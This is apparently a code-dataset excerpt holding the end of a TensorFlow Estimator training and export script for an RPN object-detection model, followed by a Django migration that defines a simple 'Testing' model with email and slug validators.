return tf.estimator.export.ServingInputReceiver(features, string_input_data)
if __name__ == "__main__":
# tf.enable_eager_execution()
parser = argparse.ArgumentParser()
parser.add_argument('--model', default='rpn', help='training_model')
parser.add_argument('--model_dir', default='./rpn_model_v2', help='where to store the model')
parser.add_argument("--train_filename", default="/home/admin-seu/sss/master_work/data/train.record",
help='train filename')
parser.add_argument("--eval_filename", default="/home/admin-seu/sss/master_work/data/eval.record",
help='eval filename')
parser.add_argument("--test_filename", default="/home/admin-seu/sss/yolo-V3/data/test.txt", help="test_filename")
parser.add_argument("--gpus", default=2, help='num_of_gpus', type=int)
args = parser.parse_args()
params = {}
params["RESNET_NUM_BLOCKS"] = _C.BACKBONE.RESNET_NUM_BLOCKS
params["num_anchors"] = _C.RPN.NUM_ANCHOR
params["head_dim"] = _C.RPN.HEAD_DIM
params["resolution"] = 14
params["num_classes"] = _C.DATA.NUM_CLASS
params["bbox_reg_weights"] = _C.FRCNN.BBOX_REG_WEIGHTS
params["weight_decay"] = _C.TRAIN.WEIGHT_DECAY
params["learning_rate"] = _C.TRAIN.BASE_LR
params["lr_schedule"] = [_C.TRAIN.WARMUP] + _C.TRAIN.LR_SCHEDULE
#dataset = input_fn(args.train_filename, True, _C.MODE_FPN)
#for idx, element in enumerate(dataset):
# print(idx)
# print(element)
# if idx == 10:
# break
if args.gpus > 0:
strategy = distribute.MirroredStrategy(num_gpus=args.gpus)
session_configs = tf.ConfigProto(allow_soft_placement=True)
session_configs.gpu_options.allow_growth = True
config = tf.estimator.RunConfig(train_distribute=strategy, session_config=session_configs,
log_step_count_steps=100, save_checkpoints_steps=40000,
eval_distribute=strategy, save_summary_steps=1000)
estimator = tf.estimator.Estimator(model_dict[args.model], args.model_dir, config,
params)
else:
config = tf.estimator.RunConfig(save_checkpoints_steps=40000, save_summary_steps=1000, log_step_count_steps=100)
estimator = tf.estimator.Estimator(model_dict[args.model], args.model_fir, config,
params)
train_spec = tf.estimator.TrainSpec(lambda: input_fn(args.train_filename, True, _C.MODE_FPN), max_steps=None)
eval_spec = tf.estimator.EvalSpec(lambda: input_fn(args.eval_filename, False, _C.MODE_FPN), steps=1000)
# tf.estimator.train_and_evaluate(estimator, train_spec, eval_spec)
estimator.export_saved_model("./export_model_0126", serve_input_fn)
"""
res = estimator.predict(lambda: eval_input_fn(args.test_filename), yield_single_examples=False)
# res = estimator.predict(lambda :input_fn(args.eval_filename, False), yield_single_examples=False)
score_thresh = 0.5
total_steps = 5000
start = time.time()
output_json_file = "./result.json"
json_file = open(output_json_file, 'w')
total_res = []
for idx, ele in enumerate(res):
# image = ele["original_image"].astype(np.uint8)
# image = cv2.cvtColor(image, cv2.COLOR_RGB2BGR)
print("current image index: ", idx)
# print("boxes: ", ele["boxes"])
# print("labels: ", ele["labels"])
# print("scores: ", ele["scores"])
ele["boxes"] = map_boxes_back(ele["boxes"], ele)
for num_idx, box in enumerate(ele["boxes"]):
# if ele["scores"][num_idx] < score_thresh:
# continue
info_dict = {}
info_dict["image_id"] = int(ele["image_id"])
info_dict["category_id"] = int(ele["labels"][num_idx])
info_dict["bbox"] = [float(box[0]), float(box[1]), float(box[2] - box[0]), float(box[3] - box[1])]
info_dict["score"] = float(ele["scores"][num_idx])
total_res.append(info_dict)
# cv2.rectangle(image, (int(box[0]), int(box[1])), (int(box[2]), int(box[3])), (255, 0, 0), 2)
# cv2.putText(image, '{}: {:.2}'.format(ele["labels"][num_idx], round(ele["scores"][num_idx], 2)), (int(box[0]), int(box[1])), cv2.FONT_HERSHEY_COMPLEX, 0.5, (0, 0, 255), 1)
# cv2.imwrite("./detect_result/{}.jpg".format(idx), image)
#print("boxes: ", ele["boxes"])
#print("labels: ", ele["labels"])
#print("scores: ", ele["scores"])
# print("rpn_boxes: ", ele["rpn_boxes"])
# print("rpn_size: ", ele["rpn_size"])
#print('valid_detection: ', ele["valid_detection"])
if idx == total_steps:
break
json.dump(total_res, json_file)
end = time.time()
print((end - start) / total_steps)
"""
| UTF-8 | Python | false | false | 20,332 | py | 39 | train.py | 32 | 0.604859 | 0.591039 | 0 | 398 | 50.080402 | 185 |
Neo31415/django_learn | 3,255,585,257,799 | 2c036d73ed7735b3737fe87497bed0392fe338f1 | 2f5447b8ef6e9759b512ad2a0c54d2b9528d0ac4 | /intro_to_models_in_django/model_playground/relationship_playground/migrations/0001_initial.py | 08fb405b3515767de877d5a6bf59438d96738630 | []
| no_license | https://github.com/Neo31415/django_learn | 4a39ea62328a56774faffb9d454d352481d21cb6 | df57a554cedba27f8fafc5708eb9c6ca21a4de0b | refs/heads/main | 2023-04-06T00:32:41.686543 | 2021-04-17T19:18:20 | 2021-04-17T19:18:20 | 302,133,051 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | # Generated by Django 3.1.5 on 2021-02-13 11:27
import django.core.validators
from django.db import migrations, models
import re
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Testing',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=100)),
('roll_number', models.IntegerField(unique=True)),
('address', models.TextField(null=True)),
('phone_number', models.CharField(blank=True, max_length=15, null=True)),
('email', models.CharField(max_length=100, null=True, validators=[django.core.validators.EmailValidator('Invalid Email Adderss')])),
('gender', models.CharField(choices=[('f', 'Female'), ('m', 'Male'), ('u', 'Undesclosed')], max_length=1, null=True)),
('slug', models.CharField(max_length=100, null=True, validators=[django.core.validators.RegexValidator(re.compile('^[-a-zA-Z0-9_]+\\Z'), 'Enter a valid “slug” consisting of letters, numbers, underscores or hyphens.', 'invalid')])),
],
),
]
| UTF-8 | Python | false | false | 1,278 | py | 33 | 0001_initial.py | 25 | 0.605965 | 0.583203 | 0 | 29 | 42.931034 | 247 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.